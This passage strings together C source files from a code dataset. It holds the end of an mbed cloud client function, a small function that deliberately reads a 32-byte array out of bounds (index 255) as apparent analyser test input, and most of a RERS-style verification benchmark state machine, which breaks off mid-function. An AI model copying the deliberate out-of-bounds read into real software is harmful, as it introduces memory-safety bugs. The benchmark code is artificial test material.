SA_PV_LOG_TRACE_FUNC_EXIT_NO_ARGS();
return KCM_STATUS_SUCCESS;
}
#endif // #ifdef MBED_CONF_MBED_CLOUD_CLIENT_SECURE_ELEMENT_SUPPORT
#endif //MBED_CONF_MBED_CLOUD_CLIENT_PSA_SUPPORT
|
the_stack_data/1181155.c | void t1(void)
{
char a[32];
int v;
v = a[0];
v = a[1];
v = a[2];
v = a[3];
v = a[4];
v = a[5]; /* not good */
v = a[31]; /* not good */
v = a[255]; /* not good */
}
|
the_stack_data/17273.c | int calculate_output(int);
int calculate_output2(int);
int calculate_output3(int);
int calculate_output4(int);
extern void __VERIFIER_error(void);
extern int __VERIFIER_nondet_int(void);
extern void exit(int);
// inputs
int f= 6;
int e= 5;
int d= 4;
int b= 2;
int a= 1;
int c= 3;
// outputs
int u = 21;
int v = 22;
int w = 23;
int x = 24;
int y = 25;
int z = 26;
int a3 = 1;
int a4 = 17;
int a25 = 1;
int a1 = 1;
int a26 = 18;
int a28 = 15;
int a7 = 1;
int a14 = 19;
int calculate_output2(int input);
int calculate_output3(int input);
int calculate_output4(int input);
int calculate_output(int input) {
if((((a25==1)&&((a1==1)&&((input==5)&&((((((a4==17)&&(a26==19))&&(a28==17))&&!(a7==1))&&(a14==20))||(((a7==1)&&(((a26==17)&&(a4==18))&&(a28==15)))&&(a14==18))))))&&(a3==1))){
a28 = 15;
a26 = 17;
a4 = 16;
a14 = 18;
a7 = 1;
return -1;
} else if((((a25==1)&&(((a28==16)&&((a4==17)&&((a1==1)&&(((((a7==1)&&(a26==18))||((a26==19)&&(a7==1)))||(!(a7==1)&&(a26==17)))&&(input==4)))))&&!(a3==1)))&&(a14==20))){
a26 = 19;
a28 = 15;
a7 = 0;
return -1;
} else if(((a28==17)&&((a1==1)&&((a25==1)&&((a7==1)&&((a4==17)&&(((a14==18)&&((input==4)&&((a26==17)||(a26==18))))&&!(a3==1)))))))){
a28 = 15;
a4 = 16;
a26 = 17;
a3 = 1;
return -1;
} else if((!(a7==1)&&(!(a3==1)&&(((a28==16)&&((a25==1)&&((a4==17)&&((((a26==17)||(a26==18))&&(input==6))&&(a1==1)))))&&(a14==19))))){
a7 = 1;
a26 = 17;
a28 = 15;
a4 = 16;
a3 = 1;
a14 = 18;
return -1;
} else if(((a28==16)&&((((a14==18)&&((!(a7==1)&&((a26==18)&&((a3==1)&&(input==1))))&&(a1==1)))&&(a25==1))&&(a4==18)))){
a7 = 1;
a28 = 15;
a4 = 16;
a26 = 17;
return -1;
} else if((!(a3==1)&&((a28==17)&&((a25==1)&&((((input==5)&&((((a14==18)&&((a26==19)&&!(a7==1)))||((a14==19)&&((a7==1)&&(a26==17))))||((a14==19)&&((a26==18)&&(a7==1)))))&&(a4==17))&&(a1==1)))))){
a28 = 15;
a4 = 16;
a7 = 1;
a14 = 18;
a26 = 17;
a3 = 1;
return -1;
} else if(((a1==1)&&((a26==17)&&((a4==18)&&(!(a7==1)&&((((a25==1)&&((input==3)&&(a28==15)))&&(a3==1))&&(a14==20))))))){
a14 = 18;
a4 = 16;
a7 = 1;
return -1;
} else if(((((((a1==1)&&(((a14==20)&&((input==2)&&(a26==17)))&&!(a7==1)))&&(a28==15))&&(a25==1))&&(a4==17))&&!(a3==1))){
a7 = 1;
a28 = 17;
a4 = 16;
a14 = 19;
a26 = 18;
return -1;
} else if(((a28==17)&&((a4==17)&&((a25==1)&&((a3==1)&&((a14==20)&&((a1==1)&&((input==6)&&((((a7==1)&&(a26==19))||((a26==17)&&!(a7==1)))||(!(a7==1)&&(a26==18))))))))))){
a28 = 15;
a14 = 18;
a4 = 16;
a7 = 1;
a26 = 17;
return -1;
} else if(((((a4==17)&&((((((!(a7==1)&&(a26==19))&&(a14==19))||((a14==20)&&((a7==1)&&(a26==17))))&&(input==3))&&(a28==15))&&(a25==1)))&&(a3==1))&&(a1==1))){
a14 = 18;
a26 = 17;
a7 = 1;
a4 = 16;
return -1;
} else if((((a28==16)&&((!(a7==1)&&((a1==1)&&((a4==17)&&((((a26==18)||(a26==19))&&(input==5))&&!(a3==1)))))&&(a14==18)))&&(a25==1))){
a4 = 16;
a28 = 15;
a7 = 1;
a3 = 1;
a26 = 17;
return -1;
} else if(((a25==1)&&(((a1==1)&&(((a7==1)&&((((input==2)&&(a4==17))&&(a28==15))&&(a3==1)))&&(a26==18)))&&(a14==19)))){
a26 = 17;
a14 = 20;
return 24;
} else if((((a26==18)&&((a7==1)&&((a28==16)&&(((((a25==1)&&(input==2))&&(a4==18))&&(a14==19))&&(a1==1)))))&&!(a3==1))){
a7 = 0;
a4 = 16;
a3 = 1;
return -1;
} else if(((a4==18)&&((a7==1)&&(!(a3==1)&&((a14==19)&&(((a1==1)&&((a28==16)&&((input==1)&&(a26==18))))&&(a25==1))))))){
a28 = 15;
a3 = 1;
a7 = 0;
a4 = 16;
a14 = 20;
return -1;
} else if(((a25==1)&&(!(a3==1)&&((a28==16)&&(((((input==3)&&((!(a7==1)&&(a26==17))||(((a7==1)&&(a26==18))||((a7==1)&&(a26==19)))))&&(a14==20))&&(a1==1))&&(a4==17)))))){
a7 = 1;
a14 = 18;
a28 = 15;
a4 = 16;
a26 = 17;
a3 = 1;
return -1;
} else if(((a4==17)&&((a25==1)&&((a14==20)&&(((!(a3==1)&&((input==5)&&((((a7==1)&&(a26==18))||((a26==19)&&(a7==1)))||((a26==17)&&!(a7==1)))))&&(a1==1))&&(a28==16)))))){
a26 = 18;
a28 = 15;
a7 = 0;
return 26;
} else if(((((((((a7==1)&&(((a26==19)||((a26==17)||(a26==18)))&&(input==5)))&&(a1==1))&&!(a3==1))&&(a25==1))&&(a14==20))&&(a4==18))&&(a28==15))){
a4 = 16;
a26 = 17;
a3 = 1;
a14 = 18;
return -1;
} else if((((a26==19)&&((a7==1)&&(((((a14==18)&&((input==4)&&(a1==1)))&&!(a3==1))&&(a25==1))&&(a28==15))))&&(a4==16))){
a3 = 1;
a26 = 17;
return -1;
} else if(((a26==18)&&(((a28==15)&&((a7==1)&&((a25==1)&&(((a4==17)&&((a14==19)&&(input==6)))&&(a3==1)))))&&(a1==1)))){
a7 = 0;
a26 = 17;
return 21;
} else if((((a14==20)&&(((a28==15)&&((((a4==17)&&((input==5)&&(a3==1)))&&(a26==19))&&(a25==1)))&&(a1==1)))&&(a7==1))){
a4 = 16;
a14 = 18;
a26 = 17;
return -1;
} else if((((a1==1)&&(((((a14==19)&&((input==4)&&(((a26==18)&&!(a7==1))||(((a7==1)&&(a26==19))||((a26==17)&&!(a7==1))))))&&(a28==16))&&(a4==16))&&(a25==1)))&&!(a3==1))){
a26 = 18;
a14 = 20;
a7 = 0;
a28 = 17;
return -1;
} else if(((a28==17)&&(((a3==1)&&((a25==1)&&((a4==18)&&((input==1)&&((((a26==19)&&!(a7==1))&&(a14==19))||(((a26==17)&&(a7==1))&&(a14==20)))))))&&(a1==1)))){
a26 = 17;
a4 = 16;
a7 = 1;
a14 = 18;
a28 = 15;
return -1;
} else if(((!(a7==1)&&(((!(a3==1)&&(((((a26==18)||(a26==19))&&(input==2))&&(a1==1))&&(a14==18)))&&(a25==1))&&(a4==16)))&&(a28==16))){
a26 = 17;
a7 = 1;
a3 = 1;
a28 = 15;
return -1;
} else if((((a1==1)&&(((a14==20)&&(((a28==17)&&(((((a7==1)&&(a26==19))||((a26==17)&&!(a7==1)))||((a26==18)&&!(a7==1)))&&(input==3)))&&(a4==17)))&&(a3==1)))&&(a25==1))){
a26 = 17;
a14 = 18;
a4 = 18;
a7 = 1;
return 22;
} else if((((a25==1)&&((a28==16)&&(((a1==1)&&((((((a26==18)&&!(a7==1))&&(a14==19))||(((a26==19)&&!(a7==1))&&(a14==19)))||((a14==20)&&((a7==1)&&(a26==17))))&&(input==5)))&&(a3==1))))&&(a4==17))){
a4 = 16;
a7 = 1;
a28 = 15;
a14 = 18;
a26 = 17;
return -1;
} else if(((a1==1)&&((a4==16)&&((((((((a26==17)||(a26==18))&&(input==3))&&(a28==16))&&(a7==1))&&(a25==1))&&!(a3==1))&&(a14==19))))){
a3 = 1;
a28 = 15;
a14 = 18;
a26 = 17;
return -1;
} else if(((a4==16)&&((a25==1)&&((a28==17)&&((((a14==19)&&(((input==1)&&((a26==18)||(a26==19)))&&(a7==1)))&&!(a3==1))&&(a1==1)))))){
a3 = 1;
a28 = 15;
a14 = 18;
a26 = 17;
return -1;
} else if(((a25==1)&&(((((a3==1)&&((((((a26==19)&&!(a7==1))&&(a14==19))||((a14==20)&&((a7==1)&&(a26==17))))||(((a7==1)&&(a26==18))&&(a14==20)))&&(input==3)))&&(a28==15))&&(a1==1))&&(a4==18)))){
a14 = 18;
a7 = 1;
a26 = 17;
a4 = 16;
return -1;
} else if(((a28==16)&&((a3==1)&&((a14==19)&&((((a4==18)&&(!(a7==1)&&((input==5)&&((a26==18)||(a26==19)))))&&(a25==1))&&(a1==1)))))){
a26 = 17;
a14 = 18;
a7 = 1;
a4 = 16;
a28 = 15;
return -1;
} else if(((!(a3==1)&&((((((((a7==1)&&(a26==19))||(!(a7==1)&&(a26==17)))&&(input==2))&&(a4==17))&&(a25==1))&&(a28==15))&&(a14==19)))&&(a1==1))){
a26 = 17;
a7 = 1;
a3 = 1;
a4 = 16;
a14 = 18;
return -1;
} else if(((((a28==17)&&(((((input==2)&&((((a26==18)&&(a7==1))||((a26==19)&&(a7==1)))||(!(a7==1)&&(a26==17))))&&(a14==18))&&(a25==1))&&(a4==18)))&&(a3==1))&&(a1==1))){
a28 = 15;
a26 = 17;
a4 = 16;
a7 = 1;
return -1;
} else if((((((a3==1)&&(((a25==1)&&(((input==4)&&(a7==1))&&(a14==20)))&&(a1==1)))&&(a4==17))&&(a28==17))&&(a26==18))){
a14 = 18;
a4 = 16;
a28 = 15;
a26 = 17;
return -1;
} else if(((a1==1)&&((a4==18)&&(((!(a7==1)&&((a14==19)&&(((input==5)&&((a26==17)||(a26==18)))&&(a25==1))))&&(a28==15))&&(a3==1))))){
a7 = 1;
a14 = 18;
a26 = 17;
a4 = 16;
return -1;
} else if(((a25==1)&&((a4==18)&&((a1==1)&&((a28==16)&&((((input==2)&&((!(a7==1)&&(a26==18))||(((a7==1)&&(a26==19))||((a26==17)&&!(a7==1)))))&&(a14==18))&&!(a3==1))))))){
a26 = 17;
a4 = 16;
a28 = 15;
a7 = 1;
a3 = 1;
return -1;
} else if((((a4==18)&&(((a28==16)&&((a3==1)&&((a14==18)&&(((!(a7==1)&&(a26==17))||(((a26==18)&&(a7==1))||((a7==1)&&(a26==19))))&&(input==2)))))&&(a1==1)))&&(a25==1))){
a26 = 17;
a28 = 15;
a4 = 16;
a7 = 1;
return -1;
} else if(((!(a7==1)&&((a28==16)&&((a25==1)&&((a1==1)&&(!(a3==1)&&(((input==5)&&(a14==19))&&(a26==18)))))))&&(a4==18))){
a26 = 19;
a7 = 1;
a14 = 20;
return 23;
} else if(((((((a28==15)&&(((a1==1)&&((input==2)&&((a26==17)||(a26==18))))&&!(a3==1)))&&(a25==1))&&(a14==19))&&(a7==1))&&(a4==16))){
a3 = 1;
a14 = 18;
a26 = 17;
return -1;
} else if(((((((!(a7==1)&&((a14==20)&&(((a26==17)||(a26==18))&&(input==6))))&&(a25==1))&&(a4==16))&&(a1==1))&&!(a3==1))&&(a28==15))){
a26 = 17;
return -1;
} else if(((a14==19)&&((a26==19)&&((a28==15)&&(((a4==16)&&(!(a3==1)&&(((a25==1)&&(input==2))&&!(a7==1))))&&(a1==1)))))){
a14 = 18;
a26 = 17;
a7 = 1;
a3 = 1;
return -1;
} else if((((((a25==1)&&((a4==18)&&((((((a7==1)&&(a26==18))||((a26==19)&&(a7==1)))||((a26==17)&&!(a7==1)))&&(input==4))&&(a14==18))))&&(a28==17))&&(a3==1))&&(a1==1))){
a28 = 15;
a7 = 1;
a26 = 17;
a4 = 16;
return -1;
} else if((((a28==16)&&((((a14==19)&&((((((a7==1)&&(a26==18))||((a7==1)&&(a26==19)))||(!(a7==1)&&(a26==17)))&&(input==1))&&(a3==1)))&&(a25==1))&&(a1==1)))&&(a4==17))){
a26 = 17;
a4 = 18;
a28 = 15;
a7 = 1;
a14 = 20;
return 22;
} else if(((a25==1)&&((((((a28==15)&&(((input==6)&&(a14==19))&&(a26==18)))&&!(a7==1))&&(a4==17))&&(a1==1))&&!(a3==1)))){
a4 = 16;
a26 = 17;
a7 = 1;
a3 = 1;
a14 = 18;
return -1;
} else if(((a3==1)&&(((((input==4)&&(((a14==18)&&((a7==1)&&((a26==17)&&(a28==16))))||(((a14==20)&&(((a26==18)&&(a28==15))&&!(a7==1)))||((!(a7==1)&&((a26==19)&&(a28==15)))&&(a14==20)))))&&(a1==1))&&(a25==1))&&(a4==18)))){
a28 = 15;
a7 = 1;
a4 = 16;
a3 = 0;
a26 = 17;
a14 = 19;
return 22;
} else if(((a14==20)&&((a25==1)&&(((a7==1)&&((((a4==16)&&((input==5)&&((a26==17)||(a26==18))))&&(a1==1))&&!(a3==1)))&&(a28==15))))){
a3 = 1;
a14 = 18;
a26 = 17;
return -1;
} else if((!(a3==1)&&(((a25==1)&&((a28==17)&&(((input==5)&&(((a14==20)&&((a26==18)&&(a7==1)))||(((!(a7==1)&&(a26==19))&&(a14==19))||((a14==20)&&((a26==17)&&(a7==1))))))&&(a4==16))))&&(a1==1)))){
a26 = 17;
a7 = 1;
a28 = 15;
a14 = 18;
a3 = 1;
return -1;
} else if(((a14==18)&&((a28==16)&&(((((!(a7==1)&&((input==6)&&((a26==18)||(a26==19))))&&(a4==16))&&!(a3==1))&&(a1==1))&&(a25==1))))){
a26 = 18;
a28 = 15;
a14 = 20;
return 26;
} else if(((a4==18)&&((a26==17)&&((a25==1)&&((a1==1)&&((((a7==1)&&((a28==16)&&(input==6)))&&(a14==20))&&(a3==1))))))){
a4 = 17;
a28 = 17;
return -1;
} else if((((a25==1)&&((a28==16)&&(!(a3==1)&&((a4==16)&&(((input==1)&&(((a7==1)&&(a26==19))||((a26==17)&&!(a7==1))))&&(a1==1))))))&&(a14==20))){
a7 = 1;
a28 = 15;
a4 = 17;
a14 = 19;
a26 = 19;
return 24;
} else if(((a1==1)&&((a3==1)&&(((a14==20)&&((a28==16)&&(((input==3)&&((((a7==1)&&(a26==18))||((a26==19)&&(a7==1)))||((a26==17)&&!(a7==1))))&&(a25==1))))&&(a4==18))))){
a26 = 17;
a14 = 18;
a4 = 16;
a7 = 1;
a28 = 15;
return -1;
} else if(((((a4==18)&&((((input==6)&&(((a14==18)&&(!(a7==1)&&(a26==19)))||((a14==19)&&((a26==17)&&(a7==1)))))&&(a1==1))&&!(a3==1)))&&(a25==1))&&(a28==16))){
a28 = 15;
a14 = 18;
a7 = 1;
a4 = 16;
a26 = 17;
a3 = 1;
return -1;
} else if(((a7==1)&&((a25==1)&&((((a1==1)&&(((a28==17)&&((input==2)&&((a26==17)||(a26==18))))&&(a14==18)))&&(a4==18))&&!(a3==1))))){
a4 = 16;
a3 = 1;
a26 = 19;
a28 = 16;
a14 = 20;
return -1;
} else if(((((((a28==16)&&((a25==1)&&((input==6)&&(((a26==17)&&!(a7==1))||(((a26==18)&&(a7==1))||((a7==1)&&(a26==19)))))))&&(a1==1))&&(a3==1))&&(a14==19))&&(a4==18))){
a26 = 17;
a14 = 18;
a4 = 16;
a7 = 1;
a28 = 15;
return -1;
} else if((((a14==19)&&((a25==1)&&((!(a7==1)&&((a28==16)&&((a4==17)&&((input==3)&&!(a3==1)))))&&(a26==19))))&&(a1==1))){
a28 = 15;
a14 = 18;
a7 = 1;
a26 = 17;
a3 = 1;
a4 = 16;
return -1;
} else if(((((a1==1)&&((((a3==1)&&((a14==19)&&((input==2)&&(a4==18))))&&(a7==1))&&(a28==15)))&&(a26==18))&&(a25==1))){
a26 = 17;
a4 = 16;
a14 = 18;
return -1;
} else if(((a4==16)&&((!(a3==1)&&((a14==19)&&((a1==1)&&(((((a26==17)||(a26==18))&&(input==4))&&(a28==15))&&!(a7==1)))))&&(a25==1)))){
a28 = 17;
a26 = 17;
a14 = 18;
return 24;
} else if(((((((a14==18)&&((((input==1)&&(a3==1))&&(a28==17))&&(a4==18)))&&!(a7==1))&&(a26==18))&&(a1==1))&&(a25==1))){
a26 = 17;
a28 = 15;
a7 = 1;
a4 = 16;
return -1;
} else if(((a7==1)&&((a26==19)&&((a1==1)&&((a14==19)&&((a25==1)&&((a28==15)&&((a4==16)&&(!(a3==1)&&(input==5)))))))))){
a3 = 1;
a14 = 18;
a26 = 17;
return -1;
} else if((!(a7==1)&&(((a1==1)&&(((!(a3==1)&&((a14==18)&&((input==6)&&((a26==19)||((a26==17)||(a26==18))))))&&(a4==16))&&(a25==1)))&&(a28==15)))){
a3 = 1;
a26 = 17;
a7 = 1;
return -1;
} else if(((a4==16)&&((!(a3==1)&&((a14==20)&&((((((a26==17)||(a26==18))&&(input==4))&&(a28==15))&&(a25==1))&&(a1==1))))&&!(a7==1)))){
a7 = 1;
a14 = 19;
a3 = 1;
a26 = 19;
a28 = 17;
a4 = 18;
return 22;
} else if((((a4==16)&&((((a14==19)&&((a7==1)&&(((input==1)&&((a26==17)||(a26==18)))&&!(a3==1))))&&(a25==1))&&(a1==1)))&&(a28==15))){
a3 = 1;
a26 = 17;
a14 = 18;
return -1;
} else if((((((a26==19)&&((a4==18)&&((!(a7==1)&&((a28==16)&&(input==2)))&&(a1==1))))&&(a14==18))&&(a25==1))&&(a3==1))){
a3 = 0;
a14 = 19;
a28 = 15;
a4 = 16;
return 26;
} else if(((((a1==1)&&((a28==17)&&((a14==20)&&((a3==1)&&(((((a26==19)&&(a7==1))||(!(a7==1)&&(a26==17)))||((a26==18)&&!(a7==1)))&&(input==5))))))&&(a4==17))&&(a25==1))){
a28 = 15;
a4 = 16;
a14 = 18;
a26 = 17;
a7 = 1;
return -1;
} else if((((a25==1)&&((a4==18)&&((((a7==1)&&(((input==6)&&(a3==1))&&(a1==1)))&&(a14==19))&&(a26==17))))&&(a28==16))){
a28 = 15;
a4 = 16;
a14 = 18;
return -1;
} else if(((((a1==1)&&(((((((a26==18)||(a26==19))&&(input==4))&&(a25==1))&&!(a3==1))&&(a14==18))&&(a28==16)))&&!(a7==1))&&(a4==16))){
a28 = 15;
a26 = 17;
a7 = 1;
a3 = 1;
return -1;
} else if(((a1==1)&&(((a14==19)&&((((a7==1)&&(((input==6)&&((a26==18)||(a26==19)))&&(a28==17)))&&!(a3==1))&&(a25==1)))&&(a4==16)))){
a14 = 18;
a3 = 1;
a28 = 15;
a26 = 17;
return -1;
} else if(((((a25==1)&&((((a7==1)&&(((input==2)&&(a14==20))&&(a4==17)))&&(a28==15))&&(a26==18)))&&(a1==1))&&(a3==1))){
a14 = 18;
a28 = 17;
return 24;
} else if(((((a1==1)&&((a14==20)&&((!(a7==1)&&(((a28==15)&&(input==5))&&(a26==17)))&&(a25==1))))&&(a3==1))&&(a4==17))){
a26 = 18;
a28 = 17;
return 22;
} else if(((a1==1)&&((a4==17)&&((a25==1)&&((a28==16)&&(!(a7==1)&&((!(a3==1)&&(((a26==18)||(a26==19))&&(input==5)))&&(a14==20)))))))){
a26 = 19;
return 24;
} else if((((a14==19)&&((a3==1)&&((a1==1)&&(((a25==1)&&(((!(a7==1)&&(a26==17))||(((a26==18)&&(a7==1))||((a26==19)&&(a7==1))))&&(input==1)))&&(a4==18)))))&&(a28==17))){
a28 = 15;
a26 = 17;
a14 = 18;
a7 = 1;
a4 = 16;
return -1;
} else if(((a28==16)&&(((a1==1)&&((a4==17)&&((a3==1)&&((a25==1)&&((input==6)&&(((a26==17)&&!(a7==1))||(((a7==1)&&(a26==18))||((a26==19)&&(a7==1)))))))))&&(a14==20)))){
a28 = 15;
a4 = 16;
a7 = 1;
a26 = 17;
a14 = 18;
return -1;
} else if((((a25==1)&&((((a1==1)&&((((input==6)&&((a26==18)||(a26==19)))&&(a4==18))&&(a14==20)))&&!(a7==1))&&(a28==15)))&&!(a3==1))){
a14 = 18;
a7 = 1;
a26 = 19;
a28 = 16;
return 22;
} else if(((a28==16)&&(((((a4==16)&&((a7==1)&&(((input==6)&&(a14==18))&&!(a3==1))))&&(a25==1))&&(a1==1))&&(a26==18)))){
a26 = 17;
a3 = 1;
a28 = 15;
return -1;
} else if((((a28==15)&&((a1==1)&&((a4==16)&&(!(a3==1)&&(((((a26==17)||(a26==18))&&(input==1))&&(a25==1))&&(a14==20))))))&&(a7==1))){
a28 = 17;
a26 = 19;
a14 = 18;
a7 = 0;
return 21;
} else if(((a1==1)&&((a28==15)&&(((a4==17)&&(((a26==19)&&(((a14==19)&&(input==4))&&(a25==1)))&&!(a3==1)))&&!(a7==1))))){
a3 = 1;
a14 = 18;
a4 = 16;
a26 = 17;
a7 = 1;
return -1;
} else if(((a14==19)&&(((a7==1)&&((((((a4==18)&&(input==4))&&(a26==18))&&(a28==15))&&(a25==1))&&(a1==1)))&&(a3==1)))){
a4 = 16;
a14 = 18;
a26 = 17;
return -1;
} else if(((((a1==1)&&((a28==16)&&((a7==1)&&((a4==18)&&(!(a3==1)&&(((a26==17)||(a26==18))&&(input==6)))))))&&(a25==1))&&(a14==18))){
a26 = 17;
a28 = 15;
a3 = 1;
a4 = 16;
return -1;
} else if((((a4==16)&&(((a1==1)&&((a26==18)&&((!(a3==1)&&((a25==1)&&(input==3)))&&(a14==18))))&&(a7==1)))&&(a28==16))){
a26 = 17;
a28 = 15;
a3 = 1;
return -1;
} else if(((a28==17)&&((a14==19)&&((a26==18)&&(!(a7==1)&&((a25==1)&&((((input==3)&&(a3==1))&&(a4==18))&&(a1==1)))))))){
a7 = 1;
return 26;
} else if(((((a1==1)&&(((((input==3)&&(((a26==17)&&!(a7==1))||(((a26==18)&&(a7==1))||((a7==1)&&(a26==19)))))&&(a28==17))&&(a4==18))&&(a3==1)))&&(a25==1))&&(a14==20))){
a7 = 1;
a26 = 17;
a4 = 16;
a28 = 15;
a14 = 18;
return -1;
} else if((((a4==18)&&((((input==6)&&((((((a28==16)&&(a26==18))&&!(a7==1))&&(a14==20))||((!(a7==1)&&((a28==16)&&(a26==19)))&&(a14==20)))||(((a7==1)&&((a28==17)&&(a26==17)))&&(a14==18))))&&(a3==1))&&(a1==1)))&&(a25==1))){
a14 = 18;
a26 = 17;
a7 = 1;
a28 = 15;
a4 = 16;
return -1;
} else if(((((a1==1)&&(((a25==1)&&(((((!(a7==1)&&(a26==19))&&(a14==19))||(((a26==17)&&(a7==1))&&(a14==20)))||((a14==20)&&((a7==1)&&(a26==18))))&&(input==6)))&&(a28==17)))&&(a4==16))&&!(a3==1))){
a3 = 1;
a28 = 15;
a26 = 17;
a14 = 18;
a7 = 1;
return -1;
} else if(((((((a1==1)&&((a4==17)&&(!(a7==1)&&((input==6)&&((a26==18)||(a26==19))))))&&(a25==1))&&!(a3==1))&&(a14==20))&&(a28==16))){
a26 = 17;
a28 = 15;
return -1;
} else if(((((a14==20)&&(((a4==18)&&(((input==2)&&((((a26==18)&&(a7==1))||((a26==19)&&(a7==1)))||((a26==17)&&!(a7==1))))&&(a25==1)))&&(a28==16)))&&(a1==1))&&(a3==1))){
a7 = 1;
a26 = 17;
a4 = 16;
a28 = 15;
a14 = 18;
return -1;
} else if(((a14==20)&&((a4==17)&&((a28==16)&&(!(a3==1)&&((a1==1)&&((a25==1)&&((((a26==18)||(a26==19))&&(input==2))&&!(a7==1))))))))){
a26 = 19;
return -1;
} else if(((a4==16)&&(!(a3==1)&&(((((a28==17)&&(((a1==1)&&(input==6))&&(a26==18)))&&(a14==19))&&!(a7==1))&&(a25==1))))){
a28 = 15;
a7 = 1;
a14 = 18;
a26 = 17;
a3 = 1;
return -1;
} else if(((((((((((a7==1)&&(a26==18))&&(a14==19))||(((a14==18)&&(!(a7==1)&&(a26==19)))||((a14==19)&&((a26==17)&&(a7==1)))))&&(input==2))&&(a4==17))&&(a1==1))&&(a28==17))&&!(a3==1))&&(a25==1))){
a28 = 15;
a26 = 17;
a7 = 1;
a14 = 18;
a3 = 1;
a4 = 16;
return -1;
} else if(((a4==16)&&(!(a7==1)&&((a25==1)&&(((a14==19)&&(!(a3==1)&&((a1==1)&&((a26==19)&&(input==3)))))&&(a28==15)))))){
a7 = 1;
a26 = 17;
a3 = 1;
a14 = 18;
return -1;
} else if(((a7==1)&&(((a28==15)&&((((((input==6)&&(a1==1))&&(a14==19))&&(a4==18))&&(a25==1))&&(a3==1)))&&(a26==17)))){
a4 = 16;
a14 = 18;
return -1;
} else if((((a1==1)&&((((a4==17)&&(!(a7==1)&&(((input==1)&&((a26==17)||(a26==18)))&&!(a3==1))))&&(a25==1))&&(a14==19)))&&(a28==16))){
a26 = 17;
a14 = 18;
a7 = 1;
a3 = 1;
a4 = 16;
a28 = 15;
return -1;
} else if((((a1==1)&&(((!(a3==1)&&((a28==17)&&(!(a7==1)&&((a14==19)&&(input==4)))))&&(a25==1))&&(a4==16)))&&(a26==18))){
a26 = 17;
a14 = 18;
a28 = 15;
a7 = 1;
a3 = 1;
return -1;
} else if(((!(a3==1)&&((!(a7==1)&&((a1==1)&&((a25==1)&&(((input==5)&&((a26==18)||(a26==19)))&&(a4==16)))))&&(a28==16)))&&(a14==18))){
a3 = 1;
a26 = 17;
a28 = 15;
a7 = 1;
return -1;
} else if((((((a28==17)&&((((((a26==18)&&(a7==1))&&(a14==19))||(((!(a7==1)&&(a26==19))&&(a14==18))||((a14==19)&&((a26==17)&&(a7==1)))))&&(input==4))&&(a1==1)))&&(a25==1))&&(a4==17))&&!(a3==1))){
a4 = 16;
a14 = 18;
a28 = 15;
a26 = 17;
a3 = 1;
a7 = 1;
return -1;
} else if((((a4==17)&&(((a28==17)&&((((((a14==19)&&((a26==18)&&!(a7==1)))||((!(a7==1)&&(a26==19))&&(a14==19)))||(((a26==17)&&(a7==1))&&(a14==20)))&&(input==1))&&(a3==1)))&&(a1==1)))&&(a25==1))){
a28 = 15;
a4 = 16;
a7 = 1;
a26 = 17;
a14 = 18;
return -1;
} else if(((((a25==1)&&(((((!(a7==1)&&((a28==15)&&(a26==19)))&&(a14==20))||(((a7==1)&&((a28==16)&&(a26==17)))&&(a14==18)))&&(input==1))&&(a4==16)))&&!(a3==1))&&(a1==1))){
a14 = 18;
a28 = 15;
a7 = 1;
a3 = 1;
a26 = 17;
return -1;
} else if((((a25==1)&&((((a3==1)&&((input==2)&&(((((a26==18)&&!(a7==1))&&(a14==19))||((!(a7==1)&&(a26==19))&&(a14==19)))||(((a7==1)&&(a26==17))&&(a14==20)))))&&(a4==17))&&(a1==1)))&&(a28==16))){
a4 = 16;
a14 = 18;
a7 = 1;
a28 = 15;
a26 = 17;
return -1;
} else if((((((a25==1)&&(((a28==15)&&((a1==1)&&((input==3)&&(a4==18))))&&!(a3==1)))&&!(a7==1))&&(a26==17))&&(a14==20))){
a3 = 1;
a14 = 18;
a4 = 16;
a7 = 1;
return -1;
} else if((((a25==1)&&((((a28==15)&&(((a1==1)&&((a3==1)&&(input==3)))&&(a4==18)))&&(a14==19))&&(a7==1)))&&(a26==19))){
a4 = 16;
a14 = 18;
a26 = 17;
return -1;
} else if(((a4==18)&&((a14==18)&&((a1==1)&&((a26==18)&&(!(a3==1)&&(((a25==1)&&((input==4)&&(a28==15)))&&!(a7==1)))))))){
a3 = 1;
a7 = 1;
a4 = 16;
a26 = 17;
return -1;
} else if(((((a1==1)&&(((((input==1)&&((((a26==19)&&(a7==1))||((a26==17)&&!(a7==1)))||((a26==18)&&!(a7==1))))&&(a28==17))&&!(a3==1))&&(a4==18)))&&(a14==18))&&(a25==1))){
a26 = 18;
a7 = 0;
return -1;
} else if(((((a4==18)&&(!(a3==1)&&((a25==1)&&((((input==1)&&((a26==18)||(a26==19)))&&(a1==1))&&(a14==19)))))&&!(a7==1))&&(a28==15))){
a14 = 20;
a26 = 17;
return 24;
} else if(((a14==19)&&((((a28==17)&&((a1==1)&&((a4==17)&&((input==1)&&((!(a7==1)&&(a26==17))||(((a26==18)&&(a7==1))||((a7==1)&&(a26==19))))))))&&(a25==1))&&(a3==1)))){
a7 = 1;
a28 = 16;
a4 = 18;
a26 = 18;
return 26;
} else if((((a25==1)&&(((a28==17)&&((((input==4)&&((((a26==18)&&(a7==1))||((a26==19)&&(a7==1)))||((a26==17)&&!(a7==1))))&&(a4==17))&&(a14==19)))&&(a1==1)))&&(a3==1))){
a7 = 1;
a26 = 17;
a14 = 18;
a28 = 15;
a4 = 16;
return -1;
} else if(((a1==1)&&((a28==17)&&((a14==19)&&((a4==17)&&(((((input==6)&&(a25==1))&&!(a3==1))&&(a26==18))&&!(a7==1))))))){
a26 = 17;
a7 = 1;
a14 = 18;
a28 = 15;
a4 = 16;
a3 = 1;
return -1;
} else if(((((((((a25==1)&&((input==6)&&(a28==15)))&&(a1==1))&&(a26==18))&&!(a3==1))&&(a4==18))&&(a7==1))&&(a14==19))){
a26 = 17;
a14 = 20;
a4 = 16;
a7 = 0;
return 26;
} else if(((a26==19)&&((a28==16)&&((a3==1)&&((a1==1)&&((a14==18)&&(((a25==1)&&((input==3)&&(a4==18)))&&!(a7==1)))))))){
a4 = 16;
a7 = 1;
a26 = 17;
a28 = 15;
return -1;
} else if((((a28==16)&&((a14==18)&&((a4==17)&&((a3==1)&&((((((a26==18)&&(a7==1))||((a26==19)&&(a7==1)))||(!(a7==1)&&(a26==17)))&&(input==3))&&(a25==1))))))&&(a1==1))){
a28 = 15;
a14 = 19;
a4 = 18;
a26 = 17;
a7 = 1;
return 24;
} else if((!(a3==1)&&(((a14==19)&&((a1==1)&&((a28==16)&&(((((a26==17)||(a26==18))&&(input==4))&&(a25==1))&&(a4==16)))))&&(a7==1)))){
a14 = 20;
a26 = 19;
a28 = 17;
return 23;
